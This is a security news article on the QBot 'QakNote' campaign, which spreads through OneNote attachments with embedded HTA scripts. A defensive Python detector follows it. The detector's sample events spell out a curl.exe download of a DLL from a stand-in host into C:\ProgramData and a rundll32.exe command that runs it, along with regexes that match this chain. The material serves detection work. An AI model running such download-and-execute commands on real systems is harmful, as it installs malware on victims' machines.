Security company Sophos has discovered a new QBot campaign dubbed “QakNote,” which uses malicious Microsoft OneNote attachments to infect systems with a banking Trojan.
A new Sophos report says the campaign began on January 31, 2023 and uses OneNote files containing an embedded HTML application (HTA file) that extracts the QBot malware payload. This transition in the QBot distribution was first publicly announced by Cynet researcher Max Malyutin on Twitter on January 31, 2023.
The script in the HTA file uses the legitimate application "curl.exe" to download the QBot DLL into the "C:\ProgramData" folder and then executes it with "Rundll32.exe".
The QBot payload is then injected into the Windows Assistive Technology manager (AtBroker.exe) to hide its presence and evade detection by antivirus software.
Sophos reports that QBot operators use two methods for distributing the HTA files: the first is sending emails with an embedded link to the malicious ".one" file, and the second is the "thread injection" method.
Thread injection is a technique in which QBot operators hijack existing email threads and send a "reply to all" message to every participant in the thread, with the malicious OneNote file attached.
To make these attacks even more deceptive, the attackers embed a fake button in the OneNote document that supposedly downloads the document from the cloud; when clicked, it launches the embedded HTA attachment instead. Although the user is warned about the risk of launching attachments after clicking the button, there is always a chance that the victim will ignore the warning.
As a defense against this new attack vector, Sophos suggests that email administrators consider blocking all files with the ".one" extension, as they are not normally sent as attachments.
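As an added defender-side example (not code from the Sophos report or this article), the following Python checks constructed process-creation events for the curl.exe download into C:\ProgramData followed by rundll32.exe loading the same DLL, as described above, and applies the suggested ".one" attachment rule. The event field names, the DLL name and the host in the sample events are constructed assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed Sysmon-style process-creation events, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\ProgramData\update.dll https://EXAMPLE-HOST/payload"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\update.dll,Start"},
    {"image": r"C:\Windows\System32\curl.exe",            # benign download, should not match
     "cmdline": r"curl.exe -o C:\Users\alice\Downloads\report.pdf https://EXAMPLE-HOST/report.pdf"},
    {"image": r"C:\Windows\System32\rundll32.exe",        # benign rundll32 use, should not match
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

PROGRAMDATA = re.compile(r"^[a-z]:\\programdata\\", re.IGNORECASE)
CURL_OUTPUT = re.compile(r'(?:^|\s)(?:-o|--output)\s+"?([^\s"]+)', re.IGNORECASE)
RUNDLL_ARG = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^\s",]+)', re.IGNORECASE)


def classify_event(ev: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (stage, dll_path) when the event matches one stage of the chain, else None."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    if image == "curl.exe":
        m = CURL_OUTPUT.search(ev["cmdline"])
        if m and PROGRAMDATA.match(m.group(1)):
            return ("curl_download_to_programdata", m.group(1).lower())
    if image == "rundll32.exe":
        m = RUNDLL_ARG.search(ev["cmdline"])
        if m and PROGRAMDATA.match(m.group(1)):
            return ("rundll32_loads_programdata_dll", m.group(1).lower())
    return None


def chained_dll_paths(events) -> List[str]:
    """DLL paths under C:\\ProgramData that were both fetched by curl.exe and loaded by rundll32.exe."""
    downloaded, loaded = set(), set()
    for ev in events:
        hit = classify_event(ev)
        if hit is None:
            continue
        (downloaded if hit[0].startswith("curl") else loaded).add(hit[1])
    return sorted(downloaded & loaded)


def is_blocked_attachment(filename: str) -> bool:
    """Mail-gateway rule suggested in the article: block OneNote (.one) attachments."""
    return filename.strip().lower().endswith(".one")


if __name__ == "__main__":
    print(chained_dll_paths(SAMPLE_EVENTS))      # ['c:\\programdata\\update.dll']
    print(is_blocked_attachment("Invoice.ONE"))  # True
```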